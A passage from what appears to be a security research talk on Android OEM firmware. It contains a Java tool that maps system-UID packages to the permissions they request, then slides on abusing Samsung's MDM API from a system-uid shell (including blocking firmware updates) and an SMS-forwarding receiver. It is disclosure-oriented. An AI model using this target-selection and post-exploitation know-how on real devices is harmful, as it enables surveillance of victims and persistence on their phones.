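        for (String raw : xmltree.split("\n")) {
            String line = raw.trim();
            if (line.startsWith("E: ")) {                 // element start: remember which one
                inUsesPermission = line.startsWith("E: uses-permission ");
                continue;
            }
            Matcher mu = SHARED_UID.matcher(line);
            if (mu.find()) { m.sharedUserId = mu.group(1); continue; }
            Matcher mp = PACKAGE.matcher(line);
            if (mp.find()) { m.pkg = mp.group(1); continue; }
            Matcher mn = PERM_NAME.matcher(line);
            if (inUsesPermission && mn.find()) {          // android:name of other elements is ignored
                m.permissions.add(mn.group(1));
            }
        }
        return m;
    }

    /** Permission -> packages that request it, over all dumps whose sharedUserId is `uid`. */
    public static TreeMap<String, List<String>> unionFor(List<String> dumps, String uid) {
        TreeMap<String, List<String>> byPerm = new TreeMap<String, List<String>>();
        for (String dump : dumps) {
            Manifest m = parse(dump);
            if (!uid.equals(m.sharedUserId)) {
                continue;
            }
            for (String p : m.permissions) {
                List<String> owners = byPerm.get(p);
                if (owners == null) {
                    owners = new ArrayList<String>();
                    byPerm.put(p, owners);
                }
                owners.add(m.pkg);
            }
        }
        return byPerm;
    }

    /** Constructed sample input in aapt's xmltree layout; names and permissions are invented. */
    static String dump(String pkg, String sharedUid, String... perms) {
        StringBuilder sb = new StringBuilder("N: android=http://schemas.android.com/apk/res/android\n");
        sb.append("  E: manifest (line=2)\n");
        if (sharedUid != null) {
            sb.append("    A: android:sharedUserId(0x0101000b)=\"").append(sharedUid)
              .append("\" (Raw: \"").append(sharedUid).append("\")\n");
        }
        sb.append("    A: package=\"").append(pkg).append("\" (Raw: \"").append(pkg).append("\")\n");
        for (String p : perms) {
            sb.append("    E: uses-permission (line=5)\n");
            sb.append("      A: android:name(0x01010003)=\"").append(p).append("\" (Raw: \"").append(p).append("\")\n");
        }
        sb.append("    E: application (line=9)\n");
        sb.append("      A: android:name(0x01010003)=\"").append(pkg).append(".App\" (Raw: \"").append(pkg).append(".App\")\n");
        return sb.toString();
    }

    public static void main(String[] args) {
        List<String> dumps = Arrays.asList(
            dump("com.example.oem.dump",  "android.uid.system", "android.permission.INTERNET"),
            dump("com.example.oem.setup", "android.uid.system", "android.permission.INSTALL_PACKAGES",
                                                                "android.permission.INTERNET"),
            dump("com.example.thirdparty", null,                "android.permission.READ_SMS"));
        TreeMap<String, List<String>> union = unionFor(dumps, "android.uid.system");
        System.out.println(union.size() + " distinct permissions for android.uid.system");
        for (Map.Entry<String, List<String>> e : union.entrySet()) {
            System.out.println("  " + e.getKey() + "  <- " + e.getValue());
        }
    }
}
```

    On a real firmware, list the installed APKs with "adb shell pm list packages -f", pull each one, run "aapt dump xmltree <apk> AndroidManifest.xml" on it and feed the outputs to unionFor(). The per-permission owner list is the useful part: it tells you which single OEM app is enough to compromise in order to reach, say, INSTALL_PACKAGES.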

    Objectives

    Plan

    1 Context and objectives

    2 Android introduction

    3 Android security model

    4 Methodology

    5 Toward a backdoor without permission

    6 Post-exploitation
      Samsung MDM for fun and laziness
      I can haz your sms?

    7 Scope of the vulnerabilities

    8 Conclusion

    Samsung MDM for fun and laziness

    The Samsung’s MDM : SAFE

    Discovery of SAFE

    SAmsung For Enterprise: A framework for Samsung models

    Exposes an API for the commercial MDMs; used partly by SamsungDive

    Implemented partly in /system/framework/services.odex

    Study of the permission system

    Many modules : BrowserPolicy, DevicePolicy, ...

    Each module checks that the calling application has the correct permission:

    One permission per module: android.permission.sec.MDM_XXX
    Enforcement via enforceXXXPermission()

    SAFE : The god mode

    The framework doesn't check the permission when the calling application is system (UID = 1000). A check built on enforceCallingPermission() would not stop such a caller anyway: AOSP's ActivityManager.checkComponentPermission() grants every permission to uid 0 and uid 1000, so a bug that yields a system-uid shell (Vuln5) also yields the whole MDM API.

    SAFE: The god mode

    MDM Usage without any restriction

    The features implemented (for us?):

    Application Policy - application backup, application uninstall, ...
    Mail Account Policy - manage mail accounts, behaviour when SSL certificates are invalid, ...
    Enterprise VPN Policy - retrieval of the certificates, passwords, ...
    Phone Restriction - block WiFi, VPN connections, USB debugging, OTA firmware updates, reset to factory settings, ...
    Misc Policy - retrieve the clipboard content, ...

    We can "infect" someone and prevent them from receiving the firmware updates that correct the vulnerabilities.

    I can haz your sms?

    SMS Forwarding

    DSMLawmo.apk

    Study of the applications listening for incoming SMS

    BroadcastReceiver listening for an Intent with action android.provider.Telephony.SMS_RECEIVED

    DSMLawmo.apk seems to have an interesting functionality...

    [...]
    if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))
    {
      Util.Logd("Start to SMS forwarding service");
      [...]
